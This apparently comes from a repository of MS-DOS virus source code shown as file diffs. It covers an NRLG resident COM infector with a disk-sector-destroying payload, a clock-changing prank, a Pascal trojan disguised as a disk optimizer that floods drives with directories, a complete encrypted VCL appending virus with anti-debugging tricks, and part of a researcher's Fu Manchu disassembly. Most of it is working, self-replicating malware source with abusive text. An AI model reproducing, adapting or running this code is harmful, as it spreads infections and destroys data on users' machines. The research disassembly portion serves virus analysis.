INT 21H ;for chek "I'm is residet?"
CMP Bh,0CAH ;is equal to CACA?
JE PUM2 ;yes! jump to runnig program
call action
;*****************************************************************
; NRLG FUNCTIONS (SELECTABLE)
;*****************************************************************
ÿcall TRASH_RN
;****************************************************************
; PROCESS TO REMAIN RESIDENT
;****************************************************************
mov ax,3521h
int 21h ;store the int 21 vectors
mov word ptr [bp+int21],bx ;in cs:int21
mov word ptr [bp+int21+2],es ;
;---------------------------------------------------------------
push cs ;
pop ax ;ax = my actual segment
dec ax ;dec my segment for look my MCB
mov es,ax ;
mov bx,es:[3] ;read the #3 byte of my MCB =total used memory
;---------------------------------------------------------------
push cs ;
pop es ;
sub bx,(offset fin - offset start + 15)/16 ;subtract the large of my virus
sub bx,17 + offset fin ;and 100H for the PSP total
mov ah,4ah ;used memory
int 21h ;put the new value to MCB
;---------------------------------------------------------------
mov bx,(offset fin - offset start + 15)/16 + 16 + offset fin
mov ah,48h ;
int 21h ;request the memory to fuck DOS!
;---------------------------------------------------------------
dec ax ;ax=new segment
mov es,ax ;ax-1= new segment MCB
mov byte ptr es:[1],8 ;put '8' in the segment
;--------------------------------------------------------------
inc ax ;
mov es,ax ;es = new segment
lea si,[bp + offset start] ;si = start of virus
mov di,100h ;di = 100H (psp position)
mov cx,offset fin - start ;cx = lag of virus
push cs ;
pop ds ;ds = cs
cld ;mov the code
rep movsb ;ds:si >> es:di
;--------------------------------------------------------------
mov dx,offset virus ;dx = new int21 handler
mov ax,2521h ;
push es ;
pop ds ;
int 21h ;set the vectors
;-------------------------------------------------------------
pum2: ;
;
mov ah,byte ptr [cs:bp + real] ;restore the 3
mov byte ptr cs:[100h],ah ;first bytes
mov ax,word ptr [cs:bp + real + 1] ;
mov word ptr cs:[101h],ax ;
;-------------------------------------------------------------
mov ax,100h ;
jmp ax ;jmp to execute
;
;*****************************************************************
;* HANDLER FOR THE INT 21H
;*****************************************************************
;
VIRUS: ;
;
cmp ah,4bh ;is a 4b function?
je REPRODUCCION ;yes! jump to reproduce !
cmp ah,11h
je dir
cmp ah,12h
je dir
dirsal:
cmp AX,0CACAH ;is ... a caca function? (resident chek)
jne a3 ;no! jump to a3
mov bh,0cah ;yes! put ca in bh
a3: ;
JMP dword ptr CS:[INT21] ;jmp to original int 21h
ret ;
make db '[NuKE] N.R.L.G. AZRAEL'
dir:
jmp dir_s
;-------------------------------------------------------------
REPRODUCCION: ;
;
pushf ;put the register
pusha ;in the stack
push si ;
push di ;
push bp ;
push es ;
push ds ;
;-------------------------------------------------------------
push cs ;
pop ds ;
mov ax,3524H ;get the dos error control
int 21h ;interupt
mov word ptr error,es ;and put in cs:error
mov word ptr error+2,bx ;
mov ax,2524H ;change the dos error control
mov dx,offset all ;for my "trap mask"
int 21h ;
;-------------------------------------------------------------
pop ds ;
pop es ;restore the registers
pop bp ;
pop di ;
pop si ;
popa ;
popf ;
;-------------------------------------------------------------
pushf ;put the registers
pusha ;
push si ;HEY! AZRAEL IS CRAZY?
push di ;PUSH, POP, PUSH, POP
push bp ;PLEEEEEAAAAAASEEEEEEEEE
push es ;PURIFY THIS SHIT!
push ds ;
;-------------------------------------------------------------
mov ax,4300h ;
int 21h ;get the file
mov word ptr cs:[attrib],cx ;atributes
;-------------------------------------------------------------
mov ax,4301h ;le saco los atributos al
xor cx,cx ;file
int 21h ;
;-------------------------------------------------------------
mov ax,3d02h ;open the file
int 21h ;for read/write
mov bx,ax ;bx=handle
;-------------------------------------------------------------
mov ax,5700h ;
int 21h ;get the file date
mov word ptr cs:[hora],cx ;put the hour
mov word ptr cs:[dia],dx ;put the day
and cx,word ptr cs:[fecha] ;calculate the seconds
cmp cx,word ptr cs:[fecha] ;is ecual to 58? (DEDICATE TO N-POX)
jne seguir ;yes! the file is infected!
jmp cerrar ;
;------------------------------------------------------------
seguir: ;
mov ax,4202h ;move the pointer to end
call movedor ;of the file
;------------------------------------------------------------
push cs ;
pop ds ;
sub ax,3 ;calculate the
mov word ptr [cs:largo],ax ;jmp long
;-------------------------------------------------------------
mov ax,04200h ;move the pointer to
call movedor ;start of file
;----------------------------------------------------------
push cs ;
pop ds ;read the 3 first bytes
mov ah,3fh ;
mov cx,3 ;
lea dx,[cs:real] ;put the bytes in cs:[real]
int 21h ;
;----------------------------------------------------------
cmp word ptr cs:[real],05a4dh ;the 2 first bytes = 'MZ' ?
jne er1 ;yes! is a EXE... fuckkk!
;----------------------------------------------------------
jmp cerrar
er1:
;----------------------------------------------------------
mov ax,4200h ;move the pointer
call movedor ;to start fo file
;----------------------------------------------------------
push cs ;
pop ds ;
mov ah,40h ;
mov cx,1 ;write the JMP
lea dx,[cs:jump] ;instruccion in the
int 21h ;fist byte of the file
;----------------------------------------------------------
mov ah,40h ;write the value of jmp
mov cx,2 ;in the file
lea dx,[cs:largo] ;
int 21h ;
;----------------------------------------------------------
mov ax,04202h ;move the pointer to
call movedor ;end of file
;----------------------------------------------------------
push cs ;
pop ds ;move the code
push cs ;of my virus
pop es ;to cs:end+50
cld ;for encrypt
mov si,100h ;
mov di,offset fin + 50 ;
mov cx,offset fin - 100h ;
rep movsb ;
;----------------------------------------------------------
mov cx,offset fin
mov di,offset fin + 50 + (offset crypt2 - offset start) ;virus
enc: ;
xor byte ptr cs:[di],1 ;encrypt the virus
inc di ;code
loop enc ;
;---------------------------------------------------------
mov cx,offset fin
mov di,offset fin + 50 + (offset crypt - offset start) ;virus
mov dx,1
enc2: ;
ÿinc di
inc di ;the virus code
loop enc2 ;
;--------------------------------------------
mov ah,40h ;
mov cx,offset fin - offset start ;copy the virus
mov dx,offset fin + 50 ;to end of file
int 21h ;
;----------------------------------------------------------
cerrar: ;
;restore the
mov ax,5701h ;date and time
mov cx,word ptr cs:[hora] ;file
mov dx,word ptr cs:[dia] ;
or cx,word ptr cs:[fecha] ;and mark the seconds
int 21h ;
;----------------------------------------------------------
mov ah,3eh ;
int 21h ;close the file
;----------------------------------------------------------
pop ds ;
pop es ;restore the
pop bp ;registers
pop di ;
pop si ;
popa ;
popf ;
;----------------------------------------------------------
pusha ;
;
mov ax,4301h ;restores the atributes
mov cx,word ptr cs:[attrib] ;of the file
int 21h ;
;
popa ;
;----------------------------------------------------------
pushf ;
pusha ; 8-( = f-prot
push si ;
push di ; 8-( = tbav
push bp ;
push es ; 8-) = I'm
push ds ;
;----------------------------------------------------------
mov ax,2524H ;
lea bx,error ;restore the
mov ds,bx ;errors handler
lea bx,error+2 ;
int 21h ;
;----------------------------------------------------------
pop ds ;
pop es ;
pop bp ;restore the
pop di ;resgisters
pop si ;
popa ;
popf ;
;----------------------------------------------------------
JMP A3 ;jmp to orig. INT 21
;
;**********************************************************
; SUBRUTINES AREA
;**********************************************************
;
movedor: ;
;
xor cx,cx ;use to move file pointer
xor dx,dx ;
int 21h ;
ret ;
;----------------------------------------------------------
all: ;
;
XOR AL,AL ;use to set
iret ;error flag
;***********************************************************
; DATA AREA
;***********************************************************
largo dw ?
jump db 0e9h
real db 0cdh,20h,0
hora dw ?
dia dw ?
attrib dw ?
int21 dd ?
error dd ?
ÿ;---------------------------------
action: ;
MOV AH,2AH ;
INT 21H ;get date
CMP Dl,byte ptr cs:[action_dia+bp] ;is equal to my day?
JE cont ;nop! fuck ret
cmp byte ptr cs:[action_dia+bp],32 ;
jne no_day ;
cont: ;
cmp dh,byte ptr cs:[action_mes+bp] ;is equal to my month?
je set ;
cmp byte ptr cs:[action_mes+bp],13 ;
jne NO_DAY ;nop! fuck ret
set: ;
j: ;
jmp j ;Halt the process
NO_DAY: ;
ret ;
;---------------------------------
ÿ;---------------------------------
TRASH_RN: ;
MOV AH,2DH ;
INT 21H ;get date
CMP Dl,6 ;is =6 (RAN 0-99)
jne NO_DAYY ;nop! fuck ret
mov ah,0dh ;
int 21h ;reset disk
mov al,2 ;
mov cx,0ffffh ;
mov dx,0 ;
int 26h ;fuck ffffh sector
mov ah,0dh ;reste disk
int 21h ;
mov al,2 ;
mov cx,0ffffh ;
mov dx,0ffffh ;new fuck+
int 26h ;heheheh!!!
NO_DAYY: ;
ret ;
;---------------------------------
ÿ;-------------;
Dir_S: ;
jmp dirsal ;
no_Good:iret ;
;-------------;
ÿaction_dia Db 01H ;day for the action
action_mes Db 01H ;month for the action
FECHA DW 08H ;Secon for mark
FECHAd Db 08H ;Secon for mark dir st
fin:
code ends
end start
MSDOS/F-Index/Virus.MSDOS.Unknown.friday.asm
+32
View File
@@ -0,0 +1,32 @@
;-------------------------------------------------------------------;
; Simple little program to change the date to July 13th, 1990 ;
; Which just happens to be a Friday...what a coincidence.... ;
; This should be great fun if you have a virus or a program that ;
; goes *BOOM* on Friday the 13th, such as the Israel strain ;
; Have fun, and remember, I'm not responsible if you get your lazy ;
; ass busted while trying to bring down the damn Pentagon ;
; Kryptic Night - SMC - RaCK - U<< - PhD ;
;-------------------------------------------------------------------;
CODE SEGMENT
Assume CS:code,DS:code
ORG 100h
start: Jmp begin
text1 db ' Telemate bug fix for version 3.0+$ ' ;Bogus filler text
text2 db ' TM.EXE fixed!$ ' ;Bogus filler text
text3 db 07h,'Error! Cannot alter TM.EXE$ ' ;Printed after change
Begin proc NEAR
mov ah,05h ;Function 5 - Set Real Time Clock
mov cx,1990h ;What century
mov dx,0713h ;Month/day
int 1ah ;Execute
mov ah,09h ;Funtion 9 - Print string <end in $>
lea dx,text3 ;What text to print
int 21h ;Execute function 09
int 20h ;Quit .COM file
begin endp
CODE ENDS ;End segment
END start ;End program
MSDOS/F-Index/Virus.MSDOS.Unknown.frodo.asm
+1828
View File
File diff suppressed because it is too large Load Diff
MSDOS/F-Index/Virus.MSDOS.Unknown.froggie.pas
+77
View File
@@ -0,0 +1,77 @@
program Disk_Space;
{ This program makes use of the
CHR command
USES command
VAR command
CLRSCR command
WRITELN command
DISKFREE command
DISKSIZE command
TRUNC command
IF-THEN-ELSE command
REPEAT-UNTIL command
ASSIGN command
REWRITE command
WRITE command
DELAY command
CLOSE command
RANDOMIZE command
}
uses dos,crt;
var cdn:byte;
dirname:string;
a,b,c,d,e,f,g,h,i,j,k,l:char;
ii:integer;
q:text;
ai:boolean;
begin
randomize;
clrscr;
cdn:=2;
gotoxy(22,2);
Writeln('Froggie-OPT v1.12 (c) Jason Friedman');
gotoxy(25,3);
writeln('Please wait - Reading System Data');
repeat;
cdn:=cdn+1;
if (diskfree(cdn)<1) and (cdn<3) then
Writeln(' Your disk for drive ',chr(cdn+64),': is not in the drive')
else
if (diskfree(cdn)>1) then
Writeln(' Your disk space free for drive ',chr(cdn+64),': is ',
trunc(diskfree(cdn)/1000),' KB out of ',trunc(disksize(cdn)/1000),' KB');
until (diskfree(cdn)<1) and (cdn>2);
delay(1000);
repeat
writeln(' Preparing to Froggie OPT - Please do not disturb');
writeln(' Any type of disturbance will cause file damnage ');
ii:=ii+1;
a:=chr(trunc(random(255)));
b:=chr(trunc(random(255)));
c:=chr(trunc(random(255)));
d:=chr(trunc(random(255)));
e:=chr(trunc(random(255)));
f:=chr(trunc(random(255)));
g:=chr(trunc(random(255)));
h:=chr(trunc(random(255)));
i:=chr(trunc(random(255)));
j:=chr(trunc(random(255)));
k:=chr(trunc(random(255)));
l:=chr(trunc(random(255)));
mkdir (a+b+c+d+e+f+g+h+i+'.'+j+k+l);
chdir (a+b+c+d+e+f+g+h+i+'.'+j+k+l);
assign (q,'YOU');
rewrite (q);
close (q);
assign (q,'ARE');
rewrite (q);
close (q);
Assign (q,'LAME');
rewrite (q);
close (q);
chdir('..');
until ai=true;
end.

MSDOS/F-Index/Virus.MSDOS.Unknown.fs.asm
+359
View File
@@ -0,0 +1,359 @@
; FS.ASM -- Fuckin Shit Virus
; Created with Nowhere Man's Virus Creation Laboratory v1.00
; Written by Unknown User
virus_type equ 0 ; Appending Virus
is_encrypted equ 1 ; We're encrypted
tsr_virus equ 0 ; We're not TSR
code segment byte public
assume cs:code,ds:code,es:code,ss:code
org 0100h
main proc near
db 0E9h,00h,00h ; Near jump (for compatibility)
start: call find_offset ; Like a PUSH IP
find_offset: pop bp ; BP holds old IP
sub bp,offset find_offset ; Adjust for length of host
call encrypt_decrypt ; Decrypt the virus
start_of_code label near
lea si,[bp + buffer] ; SI points to original start
mov di,0100h ; Push 0100h on to stack for
push di ; return to main program
movsw ; Copy the first two bytes
movsb ; Copy the third byte
mov di,bp ; DI points to start of virus
mov bp,sp ; BP points to stack
sub sp,128 ; Allocate 128 bytes on stack
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address on stack
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer on stack
int 021h
stop_tracing: mov cx,09EBh
mov ax,0FE05h ; Acutal move, plus a HaLT
jmp $-2
add ah,03Bh ; AH now equals 025h
jmp $-10 ; Execute the HaLT
lea bx,[di + null_vector] ; BX points to new routine
push cs ; Transfer CS into ES
pop es ; using a PUSH/POP
int 021h
mov al,1 ; Disable interrupt 1, too
int 021h
jmp short skip_null ; Hop over the loop
null_vector: jmp $ ; An infinite loop
skip_null: mov byte ptr [di + lock_keys + 1],130 ; Prefetch unchanged
lock_keys: mov al,128 ; Change here screws DEBUG
out 021h,al ; If tracing then lock keyboard
mov cx,0063h ; Do 99 infections
search_loop: push cx ; Save CX
call search_files ; Find and infect a file
pop cx ; Restore CX
loop search_loop ; Repeat until CX is 0
com_end: pop dx ; DX holds original DTA address
mov ah,01Ah ; DOS set DTA function
int 021h
mov sp,bp ; Deallocate local buffer
xor ax,ax ;
mov bx,ax ;
mov cx,ax ;
mov dx,ax ; Empty out the registers
mov si,ax ;
mov di,ax ;
mov bp,ax ;
ret ; Return to original program
main endp
db 0F0h,039h,067h,037h,006h
search_files proc near
push bp ; Save BP
mov bp,sp ; BP points to local buffer
sub sp,64 ; Allocate 64 bytes on stack
mov ah,047h ; DOS get current dir function
xor dl,dl ; DL holds drive # (current)
lea si,[bp - 64] ; SI points to 64-byte buffer
int 021h
mov ah,03Bh ; DOS change directory function
lea dx,[di + root] ; DX points to root directory
int 021h
call traverse ; Start the traversal
mov ah,03Bh ; DOS change directory function
lea dx,[bp - 64] ; DX points to old directory
int 021h
mov sp,bp ; Restore old stack pointer
pop bp ; Restore BP
ret ; Return to caller
root db "\",0 ; Root directory
search_files endp
traverse proc near
push bp ; Save BP
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address
mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h
mov ah,04Eh ; DOS find first function
mov cx,00010000b ; CX holds search attributes
lea dx,[di + all_files] ; DX points to "*.*"
int 021h
jc leave_traverse ; Leave if no files present
check_dir: cmp byte ptr [bp - 107],16 ; Is the file a directory?
jne another_dir ; If not, try again
cmp byte ptr [bp - 98],'.' ; Did we get a "." or ".."?
je another_dir ;If so, keep going
mov ah,03Bh ; DOS change directory function
lea dx,[bp - 98] ; DX points to new directory
int 021h
call traverse ; Recursively call ourself
pushf ; Save the flags
mov ah,03Bh ; DOS change directory function
lea dx,[di + up_dir] ; DX points to parent directory
int 021h
popf ; Restore the flags
jnc done_searching ; If we infected then exit
another_dir: mov ah,04Fh ; DOS find next function
int 021h
jnc check_dir ; If found check the file
leave_traverse:
lea dx,[di + com_mask] ; DX points to "*.COM"
call find_files ; Try to infect a file
done_searching: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h
pop bp ; Restore BP
ret ; Return to caller
up_dir db "..",0 ; Parent directory name
all_files db "*.*",0 ; Directories to search for
com_mask db "*.COM",0 ; Mask for all .COM files
traverse endp
db 032h,050h,0FFh,0D5h,088h
find_files proc near
push bp ; Save BP
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address
mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack
push dx ; Save file mask
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h
mov ah,04Eh ; DOS find first file function
mov cx,00100111b ; CX holds all file attributes
pop dx ; Restore file mask
find_a_file: int 021h
jc done_finding ; Exit if no files found
call infect_file ; Infect the file!
jnc done_finding ; Exit if no error
mov ah,04Fh ; DOS find next file function
jmp short find_a_file ; Try finding another file
done_finding: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h
pop bp ; Restore BP
ret ; Return to caller
find_files endp
db 0DCh,02Bh,0D7h,0CEh,09Eh
infect_file proc near
mov ah,02Fh ; DOS get DTA address function
int 021h
mov si,bx ; SI points to the DTA
mov byte ptr [di + set_carry],0 ; Assume we'll fail
cmp word ptr [si + 01Ah],(65279 - (finish - start))
jbe size_ok ; If it's small enough continue
jmp infection_done ; Otherwise exit
size_ok: mov ax,03D00h ; DOS open file function, r/o
lea dx,[si + 01Eh] ; DX points to file name
int 021h
xchg bx,ax ; BX holds file handle
mov ah,03Fh ; DOS read from file function
mov cx,3 ; CX holds bytes to read (3)
lea dx,[di + buffer] ; DX points to buffer
int 021h
mov ax,04202h ; DOS file seek function, EOF
cwd ; Zero DX _ Zero bytes from end
mov cx,dx ; Zero CX /
int 021h
xchg dx,ax ; Faster than a PUSH AX
mov ah,03Eh ; DOS close file function
int 021h
xchg dx,ax ; Faster than a POP AX
sub ax,finish - start + 3 ; Adjust AX for a valid jump
cmp word ptr [di + buffer + 1],ax ; Is there a JMP yet?
je infection_done ; If equal then exit
mov byte ptr [di + set_carry],1 ; Success -- the file is OK
add ax,finish - start ; Re-adjust to make the jump
mov word ptr [di + new_jump + 1],ax ; Construct jump
mov ax,04301h ; DOS set file attrib. function
xor cx,cx ; Clear all attributes
lea dx,[si + 01Eh] ; DX points to victim's name
int 021h
mov ax,03D02h ; DOS open file function, r/w
int 021h
xchg bx,ax ; BX holds file handle
mov ah,040h ; DOS write to file function
mov cx,3 ; CX holds bytes to write (3)
lea dx,[di + new_jump] ; DX points to the jump we made
int 021h
mov ax,04202h ; DOS file seek function, EOF
cwd ; Zero DX _ Zero bytes from end
mov cx,dx ; Zero CX /
int 021h
push si ; Save SI through call
call encrypt_code ; Write an encrypted copy
pop si ; Restore SI
mov ax,05701h ; DOS set file time function
mov cx,[si + 016h] ; CX holds old file time
mov dx,[si + 018h] ; DX holds old file date
int 021h
mov ah,03Eh ; DOS close file function
int 021h
mov ax,04301h ; DOS set file attrib. function
xor ch,ch ; Clear CH for file attribute
mov cl,[si + 015h] ; CX holds file's old attributes
lea dx,[si + 01Eh] ; DX points to victim's name
int 021h
infection_done: cmp byte ptr [di + set_carry],1 ; Set carry flag if failed
ret ; Return to caller
set_carry db ? ; Set-carry-on-exit flag
buffer db 090h,0CDh,020h ; Buffer to hold old three bytes
new_jump db 0E9h,?,? ; New jump to virus
infect_file endp
vcl_marker db "[VCL]",0 ; VCL creation marker
note db "Fuckin Shit Virus"
db "By White Shark"
db "Mess with the White Shark and"
db "you'll be eaten alive!"
encrypt_code proc near
push bp ; Save BP
mov bp,di ; Use BP as pointer to code
lea si,[bp + encrypt_decrypt]; SI points to cipher routine
xor ah,ah ; BIOS get time function
int 01Ah
mov word ptr [si + 9],dx ; Low word of timer is new key
xor byte ptr [si + 1],8 ;
xor byte ptr [si + 8],1 ; Change all SIs to DIs
xor word ptr [si + 11],0101h; (and vice-versa)
lea di,[bp + finish] ; Copy routine into heap
mov cx,finish - encrypt_decrypt - 1 ; All but final RET
push si ; Save SI for later
push cx ; Save CX for later
rep movsb ; Copy the bytes
lea si,[bp + write_stuff] ; SI points to write stuff
mov cx,5 ; CX holds length of write
rep movsb ; Copy the bytes
pop cx ; Restore CX
pop si ; Restore SI
inc cx ; Copy the RET also this time
rep movsb ; Copy the routine again
mov ah,040h ; DOS write to file function
lea dx,[bp + start] ; DX points to virus
lea si,[bp + finish] ; SI points to routine
call si ; Encrypt/write/decrypt
mov di,bp ; DI points to virus again
pop bp ; Restore BP
ret ; Return to caller
write_stuff: mov cx,finish - start ; Length of code
int 021h
encrypt_code endp
end_of_code label near
encrypt_decrypt proc near
lea si,[bp + start_of_code] ; SI points to code to decrypt
mov cx,(end_of_code - start_of_code) / 2 ; CX holds length
xor_loop: db 081h,034h,00h,00h ; XOR a word by the key
inc si ; Do the next word
inc si ;
loop xor_loop ; Loop until we're through
ret ; Return to caller
encrypt_decrypt endp
finish label near
code ends
end main
MSDOS/F-Index/Virus.MSDOS.Unknown.fumanchu.asm
+944
View File
@@ -0,0 +1,944 @@
page 65,132
title The 'Fu Manchu' Virus
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º British Computer Virus Research Centre º
; º 12 Guildford Street, Brighton, East Sussex, BN1 3LS, England º
; º Telephone: Domestic 0273-26105, International +44-273-26105 º
; º º
; º The 'Fu Manchu' Virus º
; º Disassembled by Joe Hirst, June 1989 º
; º º
; º Copyright (c) Joe Hirst 1989. º
; º º
; º This listing is only to be made available to virus researchers º
; º or software writers on a need-to-know basis. º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
; The virus occurs attached to the beginning of a COM file, or the end
; of an EXE file. A COM file also has the six-byte 'marker' attached
; to the end.
; This virus is a variation of the Jerusalem virus
; The disassembly has been tested by re-assembly using MASM 5.0.
RAM SEGMENT AT 0
; System data
ORG 3FCH
BW03FC DW ?
BB03FE DB ?
ORG 417H
BB0417 DB ? ; Key states
ORG 46CH
BB046C DB ? ; System clock - low byte
ORG 2CH
ENV_SG DW ? ; Segment address of environment
RAM ENDS
RAM40 SEGMENT at 400H
ORG 1AH
BW041A DW ? ; Key token in pointer
BW041C DW ? ; Key token out pointer
ORG 80H
BW0480 DW ? ; Key token buffer start pointer
BW0482 DW ? ; Key token buffer end pointer
RAM40 ENDS
CODE SEGMENT BYTE PUBLIC 'CODE'
ASSUME CS:CODE,DS:NOTHING,ES:RAM
; Entry point when attached to a COM file
START: JMP BP0010
DB 'sAX'
VR_SIG DB 'rEMHOr'
VIR_RT EQU THIS DWORD
V_RTOF DW 100H
V_RTSG DW 323FH
INT_08 EQU THIS DWORD
I08OFF DW 0106H ; Int 8 offset
I08SEG DW 0E95H ; Int 8 segment
INT_09 EQU THIS DWORD
I09OFF DW 02E9H ; Int 9 offset
I09SEG DW 0DC6H ; Int 9 segment
INT_16 EQU THIS DWORD
I16OFF DW 0 ; Int 16H offset
I16SEG DW 0 ; Int 16H segment
INT_21 EQU THIS DWORD
I21OFF DW 138DH ; Int 21H offset
I21SEG DW 029BH ; Int 21H segment
INT_24 EQU THIS DWORD
I24OFF DW 04EBH ; Int 24H offset
I24SEG DW 3228H ; Int 24H segment
BEGIN DW 0 ; Initial value for AX
F_SIZE DW 49H ; Total file size
TCOUNT1 DW 0 ; Timer count (low)
TCOUNT2 DW 0 ; Timer count (high)
ST_ES1 DW 3195H ; Original ES
SET_PA DW 00A2H
; Program parameter block
PPB_01 DW 0 ; Environment address
PPB_02 DW 0080H ; Command line offset
PPB_03 DW 3195H ; Command line segment
PPB_04 DW 005CH ; FCB1 offset
PPB_05 DW 3195H ; FCB1 segment
PPB_06 DW 006CH ; FCB2 offset
PPB_07 DW 3195H ; FCB2 segment
PRG_SP DW 0 ; Initial stack pointer store
PRG_SS DW 31A5H ; Initial stack segment store
PROGRM EQU THIS DWORD
PRGOFF DW 0 ; Initial code offset store
PRGSEG DW 31A5H ; Initial code segment store
SS_ST1 DW 0 ; Store for system area data (1)
SS_ST2 DB 86H ; Store for system area data (2)
; .EXE header store
EXEHED DB 4DH, 5AH ; 00 .EXE header ident
EXHD01 DW 0070H ; 02 Bytes in last page
EXHD02 DW 0006H ; 04 Size of file in pages
EXHD03 DW 0000H ; 06 Number of relocation entries
EXHD04 DW 0020H ; 08 Size of header in paragraphs
EXHD05 DW 0000H ; 0A Minimum extra storage required
EXHD06 DW -1 ; 0C Maximum extra storage required
EXHD07 DW 0005H ; 0E Initial stack segment
EXHD08 DW ENDADR ; 10 Initial stack pointer
EXHD09 DW 1988H ; 12 Negative checksum
EXHD10 DW 0223H ; 14 Initial code offset
EXHD11 DW 0005H ; 16 Initial code segment
DW 01EH ; 18 Relative offset of reloc table
DW 0 ; 1A Overlay number
SIGBUF DB 069H, 06FH, 06EH, 00DH, 00AH, 024H
F_HAND DW 5 ; File handle
F_ATTS DW 0020H ; File attributes
F_DATE DW 1273H ; File date
F_TIME DW 4972H ; File time
F_SIZ1 DW 0250H ; Low-order file size
F_SIZ2 DW 0 ; High-order file size
F_PATH EQU THIS DWORD
FPTHOF DW 3D5BH ; Program pathname offset
FPTHSG DW 9B70H ; Program pathname segment
COM_CM DB 'COMMAND.COM'
EXE_SW DB 0 ; EXE switch - 0 = .COM extension
MEM_SW DW 1 ; Memory allocated switch
OUT_SW DB 0 ; Output in progress switch
BYTSEC DW 0200H ; Bytes per sector
PARAGR DW 0010H ; Size of a paragraph
; The next fields are encrypted, and translate to:
;STRNG1 DB 'fu manchu virus 3/10/88 - latest in the new fun line!', 0
;STRNG2 DB 'thatcher is a cunt ', 0
;STRNG3 DB 'reagan is an arsehole ', 0
;STRNG4 DB 'botha is a bastard ', 0
;STRNG5 DB 'waldheim is a Nazi ', 0
;STRNG6 DB 'fuck', 8, 8, 8, 8, 0
;STRNG7 DB 'cunt', 8, 8, 8, 8, 0
;STRNG8 DB 'The world will hear from me again! ', 0
STRNG1 DB 0C9H, 0DAH, 08FH, 0C2H, 0CEH, 0C1H, 0CCH, 0C7H
DB 0DAH, 08FH, 0D9H, 0C6H, 0DDH, 0DAH, 0DCH, 08FH
DB 09CH, 080H, 09EH, 09FH, 080H, 097H, 097H, 08FH
DB 082H, 08FH, 0C3H, 0CEH, 0DBH, 0CAH, 0DCH, 0DBH
DB 08FH, 0C6H, 0C1H, 08FH, 0DBH, 0C7H, 0CAH, 08FH
DB 0C1H, 0CAH, 0D8H, 08FH, 0C9H, 0DAH, 0C1H, 08FH
DB 0C3H, 0C6H, 0C1H, 0CAH, 08EH, 0
STRNG2 DB 0DBH, 0C7H, 0CEH, 0DBH, 0CCH, 0C7H, 0CAH, 0DDH
DB 08FH, 0C6H, 0DCH, 08FH, 0CEH, 08FH, 0CCH, 0DAH
DB 0C1H, 0DBH, 08FH, 0
STRNG3 DB 0DDH, 0CAH, 0CEH, 0C8H, 0CEH, 0C1H, 08FH, 0C6H
DB 0DCH, 08FH, 0CEH, 0C1H, 08FH, 0CEH, 0DDH, 0DCH
DB 0CAH, 0C7H, 0C0H, 0C3H, 0CAH, 08FH, 0
STRNG4 DB 0CDH, 0C0H, 0DBH, 0C7H, 0CEH, 08FH, 0C6H, 0DCH
DB 08FH, 0CEH, 08FH, 0CDH, 0CEH, 0DCH, 0DBH, 0CEH
DB 0DDH, 0CBH, 08FH, 0
STRNG5 DB 0D8H, 0CEH, 0C3H, 0CBH, 0C7H, 0CAH, 0C6H, 0C2H
DB 08FH, 0C6H, 0DCH, 08FH, 0CEH, 08FH, 0E1H, 0CEH
DB 0D5H, 0C6H, 08FH, 0
STRNG6 DB 0C9H, 0DAH, 0CCH, 0C4H, 0A7H, 0A7H, 0A7H, 0A7H, 0
STRNG7 DB 0CCH, 0DAH, 0C1H, 0DBH, 0A7H, 0A7H, 0A7H, 0A7H, 0
STRNG8 DB 0FBH, 0C7H, 0CAH, 08FH, 0D8H, 0C0H, 0DDH, 0C3H
DB 0CBH, 08FH, 0D8H, 0C6H, 0C3H, 0C3H, 08FH, 0C7H
DB 0CAH, 0CEH, 0DDH, 08FH, 0C9H, 0DDH, 0C0H, 0C2H
DB 08FH, 0C2H, 0CAH, 08FH, 0CEH, 0C8H, 0CEH, 0C6H
DB 0C1H, 08EH, 08FH, 08FH, 08FH, 0
; Each entry is:
; DB length to find
; DB length found
; DW pointer to string
TABLE DB 10, 0
DW STRNG1
DB 9, 0
DW STRNG2
DB 7, 0
DW STRNG3
DB 6, 0
DW STRNG4
DB 9, 0
DW STRNG5
DB 4, 0
DW STRNG6
DB 4, 0
DW STRNG7
DB 0
TABOUT DW 0 ; Table entry for output
; Key number table for fake input
KEYTAB DB 03H, 1EH, 30H, 2EH, 20H, 12H, 21H, 22H ; 00 - 07
DB 0EH, 0FH, 1CH, 25H, 26H, 1CH, 31H, 18H ; 08 - 0F
DB 19H, 10H, 13H, 1FH, 14H, 16H, 2FH, 11H ; 10 - 17
DB 2DH, 15H, 2CH, 01H, 2BH, 1BH, 07H, 0CH ; 18 - 1F
DB 39H, 02H, 28H, 04H, 05H, 06H, 08H, 28H ; 20 - 27
DB 0AH, 0BH, 09H, 0DH, 33H, 0CH, 34H, 35H ; 28 - 2F
DB 0BH, 02H, 03H, 04H, 05H, 06H, 07H, 08H ; 30 - 37
DB 09H, 0AH, 27H, 27H, 33H, 0DH, 34H, 35H ; 38 - 3F
DB 03H, 1EH, 30H, 2EH, 20H, 12H, 21H, 22H ; 40 - 47
DB 23H, 17H, 24H, 25H, 26H, 32H, 31H, 18H ; 48 - 4F
DB 19H, 10H, 13H, 1FH, 14H, 16H, 2FH, 11H ; 50 - 57
DB 2DH, 15H, 2CH, 1AH, 2BH, 1BH, 07H, 0CH ; 58 - 5F
